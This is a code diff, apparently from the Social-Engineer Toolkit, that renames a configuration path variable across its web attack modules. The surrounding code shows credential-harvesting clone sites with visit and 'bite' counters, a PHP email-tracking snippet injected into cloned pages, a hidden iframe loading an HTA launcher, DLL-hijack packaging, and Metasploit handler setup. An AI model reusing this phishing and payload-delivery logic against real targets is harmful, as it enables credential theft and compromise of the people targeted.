subprocess.Popen("mkdir {0};" subprocess.Popen("mkdir {0};"
@ -158,13 +158,13 @@ if payload_counter == 1:
else: else:
subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path + "x.exe")), shell=True).wait() subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path + "x.exe")), shell=True).wait()
if os.path.isfile(os.path.join(core.setdir + "meta_config")): if os.path.isfile(os.path.join(core.userconfigpath, "meta_config")):
print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...") print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC) print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC)
try: try:
if operating_system != "windows": if operating_system != "windows":
child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path + "msfconsole"), child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir + "meta_config"))) os.path.join(core.userconfigpath, "meta_config")))
child1.interact() child1.interact()
except: except:
if operating_system != "windows": if operating_system != "windows":

24
src/webattack/browser_exploits/gen_payload.py
View file

@ -13,15 +13,15 @@ port = ""
# see if multi_attack is being used and prep everything we need # see if multi_attack is being used and prep everything we need
multiattack = "off" multiattack = "off"
webdav_enabled = "off" webdav_enabled = "off"
if os.path.isfile(setdir + "/multi_payload"): if os.path.isfile(userconfigpath + "multi_payload"):
multiattack = "on" multiattack = "on"
# just need a simple filewrite to generate a file if webdav is enabled # just need a simple filewrite to generate a file if webdav is enabled
# this is used for multi attack, it will write out file to program junk # this is used for multi attack, it will write out file to program junk
# then a simple check will determine if webdav is enabled for the port # then a simple check will determine if webdav is enabled for the port
webdav_enabled = "off" webdav_enabled = "off"
webdav_write = open(setdir + "/webdav_enabled", "w") webdav_write = open(userconfigpath + "webdav_enabled", "w")
fileopen = open(setdir + "/multi_payload", "r") fileopen = open(userconfigpath + "multi_payload", "r")
for line in fileopen: for line in fileopen:
match = re.search("MAIN=", line) match = re.search("MAIN=", line)
if match: if match:
@ -60,8 +60,8 @@ for line in configfile:
# grab attack vector # grab attack vector
attack_vector = "" attack_vector = ""
if os.path.isfile(setdir + "/attack_vector"): if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(setdir + "/attack_vector") fileopen = open(userconfigpath + "attack_vector")
for line in fileopen: for line in fileopen:
attack_vector = line.rstrip() attack_vector = line.rstrip()
@ -107,10 +107,10 @@ if multiattack == "off":
port = "443" port = "443"
# check to see if we need to use the multi attack vector in java # check to see if we need to use the multi attack vector in java
if not os.path.isfile(setdir + "/multi_java"): if not os.path.isfile(userconfigpath + "multi_java"):
filewrite = open(setdir + "/meta_config", "w") filewrite = open(userconfigpath + "meta_config", "w")
if os.path.isfile(setdir + "/multi_java"): if os.path.isfile(userconfigpath + "multi_java"):
filewrite = open(setdir + "/meta_config", "a") filewrite = open(userconfigpath + "meta_config", "a")
filewrite.write("use " + exploit + "\n") filewrite.write("use " + exploit + "\n")
filewrite.write("set PAYLOAD " + choice1 + "\n") filewrite.write("set PAYLOAD " + choice1 + "\n")
@ -160,10 +160,10 @@ filewrite.write("set ExitOnSession false\n")
# if we are using multiple meterpreter multiscripts # if we are using multiple meterpreter multiscripts
if meterpreter_multi == "ON": if meterpreter_multi == "ON":
multiwrite = open(setdir + "/multi_meter.file", "w") multiwrite = open(userconfigpath + "multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command) multiwrite.write(meterpreter_multi_command)
filewrite.write( filewrite.write(
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir)) "set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
multiwrite.close() multiwrite.close()
# auto migration # auto migration
@ -180,6 +180,6 @@ if webdav_enabled == "on":
# this basically sets a flag we need to make some custom changes in web_server.py to get # this basically sets a flag we need to make some custom changes in web_server.py to get
# the docbase exploit to work properly # the docbase exploit to work properly
if exploit == ("windows/browser/java_docbase_bof"): if exploit == ("windows/browser/java_docbase_bof"):
filewrite = open(setdir + "/docbase.file", "w") filewrite = open(userconfigpath + "docbase.file", "w")
filewrite.write("DOCBASE=ON") filewrite.write("DOCBASE=ON")
filewrite.close() filewrite.close()

16
src/webattack/dll_hijacking/hijacking.py
View file

@ -60,7 +60,7 @@ for line in fileopen:
print("\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension, dll)) print("\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension, dll))
# prep the directories # prep the directories
subprocess.Popen("mkdir " + setdir + "/dll", stdout=subprocess.PIPE, subprocess.Popen("mkdir " + userconfigpath + "dll", stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True).wait() stderr=subprocess.PIPE, shell=True).wait()
filename1 = input(setprompt( filename1 = input(setprompt(
["2", "15"], "Enter the filename for the attack (example:openthis) [openthis]")) ["2", "15"], "Enter the filename for the attack (example:openthis) [openthis]"))
@ -68,7 +68,7 @@ if filename1 == "":
filename1 = "openthis" filename1 = "openthis"
# move the files there using the correct extension and file type # move the files there using the correct extension and file type
filewrite = open(setdir + "/dll/%s%s" % (filename1, extension), "w") filewrite = open(userconfigpath + "dll/%s%s" % (filename1, extension), "w")
filewrite.write("EMPTY") filewrite.write("EMPTY")
filewrite.close() filewrite.close()
@ -82,7 +82,7 @@ else:
fileopen = open("src/webattack/dll_hijacking/hijacking.dll", "rb") fileopen = open("src/webattack/dll_hijacking/hijacking.dll", "rb")
data = fileopen.read() data = fileopen.read()
filewrite = open(setdir + "/dll/%s" % (dll), "wb") filewrite = open(userconfigpath + "dll/%s" % (dll), "wb")
host = int(len(ipaddr) + 1) * "X" host = int(len(ipaddr) + 1) * "X"
@ -127,7 +127,7 @@ if choice == "1":
# we get a hit? # we get a hit?
if match: if match:
subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" % subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait() (userconfigpath, userconfigpath), shell=True).wait()
counter = 1 counter = 1
# if we didnt find rar # if we didnt find rar
@ -139,11 +139,11 @@ if choice == "1":
# if its a zipfile zip the badboy up # if its a zipfile zip the badboy up
if choice == "2": if choice == "2":
# write to a zipfile here # write to a zipfile here
file = zipfile.ZipFile(setdir + "/template.zip", "w") file = zipfile.ZipFile(userconfigpath + "template.zip", "w")
for name in glob.glob(setdir + "/dll/*"): for name in glob.glob(userconfigpath + "dll/*"):
file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED) file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED)
file.close() file.close()
if os.path.isfile(setdir + "/msf.exe"): if os.path.isfile(userconfigpath + "msf.exe"):
subprocess.Popen("cp %s/msf.exe %s/src/html/" % subprocess.Popen("cp %s/msf.exe %s/src/html/" %
(setdir, definepath), shell=True).wait() (userconfigpath, definepath), shell=True).wait()

60
src/webattack/harvester/harvester.py
View file

@ -75,7 +75,7 @@ except Exception as err:
attack_vector = "" attack_vector = ""
fileopen = open(setdir + "/attack_vector", "r") fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
if line == 'multiattack': if line == 'multiattack':
@ -111,7 +111,7 @@ for line in fileopen:
if match2: if match2:
command_center = "on" command_center = "on"
command_center_write = open( command_center_write = open(
setdir + "/cc_harvester_hit" % (setdir), "w") userconfigpath + "cc_harvester_hit" % (userconfigpath), "w")
# if nada default port 80 # if nada default port 80
if counter == 0: if counter == 0:
@ -119,7 +119,7 @@ if counter == 0:
# pull URL field # pull URL field
counter = 0 counter = 0
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("URL=", line) match = re.search("URL=", line)
@ -166,10 +166,10 @@ for line in fileopen:
sys.path.append("src/core/ssl") sys.path.append("src/core/ssl")
# import our ssl module # import our ssl module
import setssl import setssl
subprocess.Popen("cp %s/CA/*.pem %s" % (setdir, setdir), subprocess.Popen("cp %s/CA/*.pem %s" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# remove old junk we dont need anymore # remove old junk we dont need anymore
subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (setdir, setdir), subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# if user wants to specify his/her own PEM certificate # if user wants to specify his/her own PEM certificate
@ -184,7 +184,7 @@ for line in fileopen:
print("\nUnable to find PEM file, check location and config again.") print("\nUnable to find PEM file, check location and config again.")
exit_set() exit_set()
if os.path.isfile(pem_client): if os.path.isfile(pem_client):
subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, setdir), subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
match2 = re.search("PEM_SERVER=", line) match2 = re.search("PEM_SERVER=", line)
if match2: if match2:
@ -193,7 +193,7 @@ for line in fileopen:
print("\nUnable to find PEM file, check location and config again.") print("\nUnable to find PEM file, check location and config again.")
exit_set() exit_set()
if os.path.isfile(pem_server): if os.path.isfile(pem_server):
subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, setdir), subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# url decode for postbacks # url decode for postbacks
@ -211,8 +211,8 @@ def urldecode(url):
# here is where we specify how many people actually visited versus fell for it # here is where we specify how many people actually visited versus fell for it
visits = open(setdir + "/visits.file", "a") visits = open(userconfigpath + "visits.file", "a")
bites = open(setdir + "/bites.file", "a") bites = open(userconfigpath + "bites.file", "a")
# SET Handler for handling POST requests and general setup through SSL # SET Handler for handling POST requests and general setup through SSL
@ -247,7 +247,7 @@ class SETHandler(BaseHTTPRequestHandler):
#print('-' * 40) #print('-' * 40)
pass pass
webroot = os.path.abspath(os.path.join(setdir, 'web_clone')) webroot = os.path.abspath(os.path.join(userconfigpath, 'web_clone'))
requested_file = os.path.abspath(os.path.join(webroot, self.path)) requested_file = os.path.abspath(os.path.join(webroot, self.path))
# try block setup to catch transmission errors # try block setup to catch transmission errors
try: try:
@ -256,7 +256,7 @@ class SETHandler(BaseHTTPRequestHandler):
self.send_response(200) self.send_response(200)
self.send_header('Content_type', 'text/html') self.send_header('Content_type', 'text/html')
self.end_headers() self.end_headers()
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
for line in fileopen: for line in fileopen:
self.wfile.write(line) self.wfile.write(line)
# write out that we had a visit # write out that we had a visit
@ -268,7 +268,7 @@ class SETHandler(BaseHTTPRequestHandler):
self.send_response(200) self.send_response(200)
self.send_header('Content_type', 'text/html') self.send_header('Content_type', 'text/html')
self.end_headers() self.end_headers()
fileopen = open(setdir + "/web_clone/index2.html", "r") fileopen = open(userconfigpath + "web_clone/index2.html", "r")
for line in fileopen: for line in fileopen:
self.wfile.write(line) self.wfile.write(line)
# write out that we had a visit # write out that we had a visit
@ -310,7 +310,7 @@ class SETHandler(BaseHTTPRequestHandler):
# change path to root for append on file # change path to root for append on file
os.chdir(homepath) os.chdir(homepath)
# put the params into site.template for later user # put the params into site.template for later user
filewrite = open(setdir + "/site.template", "a") filewrite = open(userconfigpath + "site.template", "a")
filewrite.write("\n") filewrite.write("\n")
if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())): if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())):
filewrite3 = open("%s/src/logs/harvester.log" % os.getcwd(), "w") filewrite3 = open("%s/src/logs/harvester.log" % os.getcwd(), "w")
@ -356,7 +356,7 @@ class SETHandler(BaseHTTPRequestHandler):
# pull URL field # pull URL field
counter = 0 counter = 0
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("URL=", line) match = re.search("URL=", line)
@ -380,7 +380,7 @@ class SETHandler(BaseHTTPRequestHandler):
'<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL)) '<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL))
# set it back to our homepage # set it back to our homepage
os.chdir(setdir + "/web_clone/") os.chdir(userconfigpath + "web_clone/")
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer): class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
@ -526,37 +526,37 @@ def run():
(logpath, harvester_file), shell=True).wait() (logpath, harvester_file), shell=True).wait()
# if we are using webjacking, etc. # if we are using webjacking, etc.
if os.path.isfile(setdir + "/web_clone/index2.html"): if os.path.isfile(userconfigpath + "web_clone/index2.html"):
# need to copy the files over - remove the old one first if there # need to copy the files over - remove the old one first if there
if os.path.isfile(apache_dir + "/index2.html"): if os.path.isfile(apache_dir + "/index2.html"):
os.remove(apache_dir + "/index2.html") os.remove(apache_dir + "/index2.html")
shutil.copyfile(setdir + "/web_clone/index2.html", shutil.copyfile(userconfigpath + "web_clone/index2.html",
apache_dir + "/index2.html") apache_dir + "/index2.html")
# here we specify if we are tracking users and such # here we specify if we are tracking users and such
if track_email == True: if track_email == True:
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
data = fileopen.read() data = fileopen.read()
data = data.replace( data = data.replace(
"<body>", """<body><?php $file = '%s'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (harvester_file)) "<body>", """<body><?php $file = '%s'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (harvester_file))
filewrite = open(setdir + "/web_clone/index.2", "w") filewrite = open(userconfigpath + "web_clone/index.2", "w")
filewrite.write(data) filewrite.write(data)
filewrite.close() filewrite.close()
os.remove(setdir + "/web_clone/index.html") os.remove(userconfigpath + "web_clone/index.html")
shutil.copyfile(setdir + "/web_clone/index.2", shutil.copyfile(userconfigpath + "web_clone/index.2",
setdir + "/web_clone/index.html") userconfigpath + "web_clone/index.html")
# copy the entire web_clone directory. # copy the entire web_clone directory.
# Without this only index.php|html are copied even though the user # Without this only index.php|html are copied even though the user
# may have chosen to import the entire directory in the set module. # may have chosen to import the entire directory in the set module.
copyfolder(setdir + "/web_clone", apache_dir) copyfolder(userconfigpath + "web_clone", apache_dir)
if os.path.isfile("%s/index.html" % (apache_dir)): if os.path.isfile("%s/index.html" % (apache_dir)):
os.remove("%s/index.html" % (apache_dir)) os.remove("%s/index.html" % (apache_dir))
if track_email == False: if track_email == False:
shutil.copyfile(setdir + "/web_clone/index.html", shutil.copyfile(userconfigpath + "web_clone/index.html",
"%s/index.html" % (apache_dir)) "%s/index.html" % (apache_dir))
if track_email == True: if track_email == True:
shutil.copyfile(setdir + "/web_clone/index.html", shutil.copyfile(userconfigpath + "web_clone/index.html",
"%s/index.php" % (apache_dir)) "%s/index.php" % (apache_dir))
print_status( print_status(
"NOTE: The URL to click on is index.php NOT index.html with track emails.") "NOTE: The URL to click on is index.php NOT index.html with track emails.")
@ -615,7 +615,7 @@ if webattack_email == True:
module_reload(src.phishing.smtp.client.smtp_web) module_reload(src.phishing.smtp.client.smtp_web)
# see if we're tabnabbing or multiattack # see if we're tabnabbing or multiattack
fileopen = open(setdir + "/attack_vector", "r") fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
if line == 'tabnabbing': if line == 'tabnabbing':
@ -628,12 +628,12 @@ for line in fileopen:
if ssl_flag == 'true': if ssl_flag == 'true':
web_port = "443" web_port = "443"
# check for PEM files here # check for PEM files here
if not os.path.isfile(setdir + "/newreq.pem"): if not os.path.isfile(userconfigpath + "newreq.pem"):
print("PEM files not detected. SSL will not work properly.") print("PEM files not detected. SSL will not work properly.")
if not os.path.isfile(setdir + "/newcert.pem"): if not os.path.isfile(userconfigpath + "newcert.pem"):
print("PEM files not detected. SSL will not work properly.") print("PEM files not detected. SSL will not work properly.")
# copy over our PEM files # copy over our PEM files
subprocess.Popen("cp %s/*.pem %s/web_clone/" % (setdir, setdir), subprocess.Popen("cp %s/*.pem %s/web_clone/" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# copy patched socket over to web clone # copy patched socket over to web clone
definepath = os.getcwd() definepath = os.getcwd()
@ -643,7 +643,7 @@ if ssl_flag == 'true':
# head over to cloned dir # head over to cloned dir
if apache_check == False: if apache_check == False:
os.chdir(setdir + "/web_clone/") os.chdir(userconfigpath + "web_clone/")
if attack_vector != "multiattack": if attack_vector != "multiattack":
if apache_check == False: if apache_check == False:

30
src/webattack/harvester/report_generator.py
View file

@ -7,8 +7,8 @@ import datetime
from src.core.setcore import * from src.core.setcore import *
# make sure the reports directory is created # make sure the reports directory is created
if not os.path.isdir(setdir + "/reports/"): if not os.path.isdir(userconfigpath + "reports/"):
os.makedirs(setdir + "/reports/") os.makedirs(userconfigpath + "reports/")
# #
# Quick report generation script # Quick report generation script
@ -33,20 +33,20 @@ definepath = os.getcwd()
# grab URL and report information # grab URL and report information
now = datetime.datetime.today() now = datetime.datetime.today()
fileopen = open(setdir + "/site.template", "r") fileopen = open(userconfigpath + "site.template", "r")
site_template = open(setdir + "/site.template", "r").readlines() site_template = open(userconfigpath + "site.template", "r").readlines()
fileopen1 = open("%s/src/core/reports/index.html" % (definepath), "r") fileopen1 = open("%s/src/core/reports/index.html" % (definepath), "r")
for line in fileopen: for line in fileopen:
match = re.search("URL=", line) match = re.search("URL=", line)
if match: if match:
url = line.replace("URL=http://", "") url = line.replace("URL=http://", "")
url = line.replace("URL=https://", "") url = line.replace("URL=https://", "")
filewrite2 = open(setdir + "/reports/%s.xml" % (now), "a") filewrite2 = open(userconfigpath + "reports/%s.xml" % (now), "a")
filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n") filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n")
filewrite2.write(r"<harvester>" + "\n") filewrite2.write(r"<harvester>" + "\n")
for line2 in fileopen1: for line2 in fileopen1:
counter = 0 counter = 0
filewrite = open(setdir + "/reports/%s.html" % (now), "a") filewrite = open(userconfigpath + "reports/%s.html" % (now), "a")
match1 = re.search("REPLACEHEREDUDE", line2) match1 = re.search("REPLACEHEREDUDE", line2)
if match1: if match1:
line2 = line2.replace("REPLACEHEREDUDE", url) line2 = line2.replace("REPLACEHEREDUDE", url)
@ -83,8 +83,8 @@ for line in fileopen:
# look for how many people visited the website # look for how many people visited the website
match5 = re.search("VISITORSHERE", line2) match5 = re.search("VISITORSHERE", line2)
if match5: if match5:
if os.path.isfile(setdir + "/visits.file"): if os.path.isfile(userconfigpath + "visits.file"):
fileopen3 = open(setdir + "/visits.file", "r") fileopen3 = open(userconfigpath + "visits.file", "r")
counter5 = 0 counter5 = 0
for line in fileopen3: for line in fileopen3:
if line != "": if line != "":
@ -92,7 +92,7 @@ for line in fileopen:
counter5 = counter5 + 1 counter5 = counter5 + 1
if line == "": if line == "":
counter5 = 0 counter5 = 0
if not os.path.isfile(setdir + "/visits.file"): if not os.path.isfile(userconfigpath + "visits.file"):
counter5 = 0 counter5 = 0
line2 = line2.replace("VISITORSHERE", str(counter5), 2) line2 = line2.replace("VISITORSHERE", str(counter5), 2)
@ -101,13 +101,13 @@ for line in fileopen:
match6 = re.search("BITESHERE", line2) match6 = re.search("BITESHERE", line2)
if match6: if match6:
if os.path.isfile(setdir + "/bites.file"): if os.path.isfile(userconfigpath + "bites.file"):
fileopen4 = open(setdir + "/bites.file", "r") fileopen4 = open(userconfigpath + "bites.file", "r")
counter5 = 0 counter5 = 0
for line in fileopen4: for line in fileopen4:
line = line.rstrip() line = line.rstrip()
counter5 = counter5 + 1 counter5 = counter5 + 1
if not os.path.isfile(setdir + "/bites.file"): if not os.path.isfile(userconfigpath + "bites.file"):
counter5 = 0 counter5 = 0
line2 = line2.replace("BITESHERE", str(counter5)) line2 = line2.replace("BITESHERE", str(counter5))
@ -125,6 +125,6 @@ except:
pass pass
subprocess.Popen("cp -rf %s/src/core/reports/files %s/reports/" % (definepath, subprocess.Popen("cp -rf %s/src/core/reports/files %s/reports/" % (definepath,
setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (setdir, now) + bcolors.ENDC) print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC)
print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (setdir, now) + bcolors.ENDC) print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC)

22
src/webattack/harvester/scraper.py
View file

@ -24,13 +24,13 @@ else:
# set the multiattack tabnabbing/webjacking flag # set the multiattack tabnabbing/webjacking flag
multi_tabnabbing = "off" multi_tabnabbing = "off"
multi_webjacking = "off" multi_webjacking = "off"
if os.path.isfile(setdir + "/multi_tabnabbing"): if os.path.isfile(userconfigpath + "multi_tabnabbing"):
multi_tabnabbing = "on" multi_tabnabbing = "on"
if os.path.isfile(setdir + "/multi_webjacking"): if os.path.isfile(userconfigpath + "multi_webjacking"):
multi_webjacking = "on" multi_webjacking = "on"
# see if we're tabnabbing # see if we're tabnabbing
fileopen = open(setdir + "/attack_vector", "r") fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
if line == 'tabnabbing' or multi_tabnabbing == "on" or line == 'webjacking' or multi_webjacking == "on": if line == 'tabnabbing' or multi_tabnabbing == "on" or line == 'webjacking' or multi_webjacking == "on":
@ -59,8 +59,8 @@ if apache_mode == "on":
apache_rewrite = "post.php" apache_rewrite = "post.php"
# start the scraping process # start the scraping process
fileopen = open(setdir + "/web_clone/%s" % (site), "r").readlines() fileopen = open(userconfigpath + "web_clone/%s" % (site), "r").readlines()
filewrite = open(setdir + "/web_clone/index.html.new", "w") filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
for line in fileopen: for line in fileopen:
# specify if it found post params # specify if it found post params
@ -102,9 +102,9 @@ for line in fileopen:
# close the file # close the file
filewrite.close() filewrite.close()
# move our newly created website with our post stuff to our cloned area # move our newly created website with our post stuff to our cloned area
if os.path.isfile(setdir + "/web_clone/index.html.new"): if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
shutil.copyfile(setdir + "/web_clone/index.html.new", setdir + "/" + site) shutil.copyfile(userconfigpath + "web_clone/index.html.new", userconfigpath + "" + site)
if os.path.isfile(setdir + "/web_clone/" + site): if os.path.isfile(userconfigpath + "web_clone/" + site):
os.remove(setdir + "/web_clone/" + site) os.remove(userconfigpath + "web_clone/" + site)
shutil.move(setdir + "/web_clone/index.html.new", shutil.move(userconfigpath + "web_clone/index.html.new",
setdir + "/web_clone/%s" % (site)) userconfigpath + "web_clone/%s" % (site))

6
src/webattack/hta/main.py
View file

@ -56,16 +56,16 @@ def gen_hta_cool_stuff():
html_code = ("""<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>\n<script type="text/javascript">setTimeout(function(){window.location.href="%s";}, 15000);</script>""" % url) html_code = ("""<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>\n<script type="text/javascript">setTimeout(function(){window.location.href="%s";}, 15000);</script>""" % url)
# metasploit answer file here # metasploit answer file here
filewrite = open(setdir + "/meta_config", "w") filewrite = open(userconfigpath + "meta_config", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port)) filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port))
filewrite.close() filewrite.close()
# write out main1 and main2 # write out main1 and main2
filewrite = open(setdir + "/hta_index", "w") filewrite = open(userconfigpath + "hta_index", "w")
filewrite.write(html_code) filewrite.write(html_code)
filewrite.close() filewrite.close()
# write out launcher.hta # write out launcher.hta
filewrite = open(setdir + "/Launcher.hta", "w") filewrite = open(userconfigpath + "Launcher.hta", "w")
filewrite.write(main1 + main2 + main3 + main4) filewrite.write(main1 + main2 + main3 + main4)
filewrite.close() filewrite.close()

10
src/webattack/multi_attack/multiattack.py
View file

@ -51,12 +51,12 @@ def flag_off(vector):
def write_file(filename, results): def write_file(filename, results):
filewrite = open(setdir + "/%s" % (filename), "w") filewrite = open(userconfigpath + "%s" % (filename), "w")
filewrite.write(results) filewrite.write(results)
filewrite.close() filewrite.close()
# specify attackvector # specify attackvector
filewrite = open(setdir + "/attack_vector", "w") filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("multiattack") filewrite.write("multiattack")
filewrite.close() filewrite.close()
@ -79,14 +79,14 @@ webdav_enable = "OFF"
# see if we are running a custom cloned website # see if we are running a custom cloned website
clonedurl = 0 clonedurl = 0
fileopen = open(setdir + "/site.template", "r") fileopen = open(userconfigpath + "site.template", "r")
data = fileopen.read() data = fileopen.read()
if "TEMPLATE=SELF" in data: if "TEMPLATE=SELF" in data:
clonedurl = 1 clonedurl = 1
# clean up cloner directory # clean up cloner directory
if clonedurl == 0: if clonedurl == 0:
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (setdir, setdir), subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# set a quick loop to see what the user wants # set a quick loop to see what the user wants
@ -349,7 +349,7 @@ if meta_attack == "on":
# this checks to see if the MSF payload uses webdav, if so we have to # this checks to see if the MSF payload uses webdav, if so we have to
# force port 80 # force port 80
if os.path.isfile(setdir + "/webdav_enabled"): if os.path.isfile(userconfigpath + "webdav_enabled"):
webdav_enabled = "on" webdav_enabled = "on"
# set this incase msf attack, java applet, and harvester is needed # set this incase msf attack, java applet, and harvester is needed

16
src/webattack/tabnabbing/tabnabbing.py
View file

@ -18,13 +18,13 @@ for line in fileopen:
webjacking_timing = line webjacking_timing = line
# grab attack_vector specification # grab attack_vector specification
fileopen = open(setdir + "/attack_vector", "r") fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen: for line in fileopen:
attack_vector = line.rstrip() attack_vector = line.rstrip()
# need to see if we created file to trigger multi attack webjacking # need to see if we created file to trigger multi attack webjacking
multi_webjacking = "off" multi_webjacking = "off"
if os.path.isfile(setdir + "/multi_webjacking"): if os.path.isfile(userconfigpath + "multi_webjacking"):
multi_webjacking = "on" multi_webjacking = "on"
@ -34,7 +34,7 @@ if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=") ipaddr = check_options("IPADDR=")
# pull URL field so we can pull favicon later on # pull URL field so we can pull favicon later on
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen: for line in fileopen:
match = re.search("URL=", line) match = re.search("URL=", line)
if match: if match:
@ -48,12 +48,12 @@ for line in fileopen:
# move cloned site to index2.html # move cloned site to index2.html
subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" % subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" %
(setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# grab the source and write it out to the cloned directory # grab the source and write it out to the cloned directory
fileopen = open("src/webattack/tabnabbing/source.js", "r") fileopen = open("src/webattack/tabnabbing/source.js", "r")
# write it to dir # write it to dir
filewrite = open(setdir + "/web_clone/source.js", "w") filewrite = open(userconfigpath + "web_clone/source.js", "w")
# loop # loop
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
@ -66,10 +66,10 @@ filewrite.close()
if attack_vector == "tabnabbing": if attack_vector == "tabnabbing":
# grab favicon # grab favicon
favicon = urllib.urlopen("%s/favicon.ico" % (URL)) favicon = urllib.urlopen("%s/favicon.ico" % (URL))
output = open(setdir + '/web_clone/favicon.ico', 'wb') output = open(userconfigpath + '/web_clone/favicon.ico', 'wb')
output.write(favicon.read()) output.write(favicon.read())
